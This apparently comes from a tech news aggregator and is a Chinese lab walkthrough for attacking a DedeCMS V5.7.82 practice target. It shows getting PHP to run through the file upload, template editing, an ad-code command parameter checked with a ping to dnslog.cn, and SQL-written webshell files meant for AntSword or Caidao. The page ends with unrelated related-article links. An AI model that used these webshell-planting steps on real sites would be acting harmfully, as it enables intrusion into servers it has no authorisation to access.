当前位置: 首页 > news >正文

DeDeCMS靶场攻略

news 2025/7/1 17:43:20

文件管理器

点击模块,选择上传文件

 在电脑中新建2.php

<?php phpinfo();?>

 访问2.php,验证是否成功

 修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

 点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

 后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

 点击[代码]

 得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

 在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir 

 在得到的目录下写入木马文件

 访问后得到12.php

这些成功后可以用蚁剑,caidao连接 

http://www.dtcms.com/a/80487.html

相关文章:

  • pytest的测试报告allure
  • MongoDB 配合python使用的入门教程
  • 微软产品的专有名词和官方视频教程
  • 柔性PZT压电薄膜触觉传感器在人形机器人的应用
  • Android Launcher3终极改造:全屏应用展示实战!深度解析去除Hotseat的隐藏技巧
  • 如何设计大模型意图识别?
  • 学习笔记|arduino uno r3|DS1307时钟芯片|Atmega328P| 设置时间|读取时间|无源晶振:DS1307时钟芯片实验
  • 2025 使用docker部署centos7容器并且需要centos7容器能通过ssh登录SSH 登录的CentOS7容器
  • Linux CentOS7 安装 ffmpeg教程
  • 【总结】常用API架构类型
  • C++异常处理时的异常类型抛出选择
  • 2021-06-15 C逆序存入数组的元素
  • 韩顺平 一周学会Linux | Linux 实操篇-定时任务调度
  • 使用C#创建安装Windows服务程序
  • 第一个Spring程序基于Spring6
  • ROS从小白到入门:知识点速通与面试指南
  • CatFlag 原理
  • 密码学(Public-Key Cryptography and Discrete Logarithms)
  • Docker 部署 XXL-JOB
  • 粘包半包以及Netty的解决办法
  • HCITool 的详细介绍、安装指南及使用说明
  • 合批Batching
  • MySQL 中利用 mysql.help_topic 实现行转列的深入剖析
  • 物理标签与逻辑标签的区别
  • 第七节 MATLAB数据类型
  • Pytorch使用手册—自定义 C++ 和 CUDA 扩展(专题五十二)
  • Altium Design元件管理笔记
  • PolyBench基准程序详解:编译器优化评测指标
  • IDEA 出现 Cannot access aliyunmaven in offline mode 问题解决方案
  • 【愚公系列】《高效使用DeepSeek》020-专业术语解释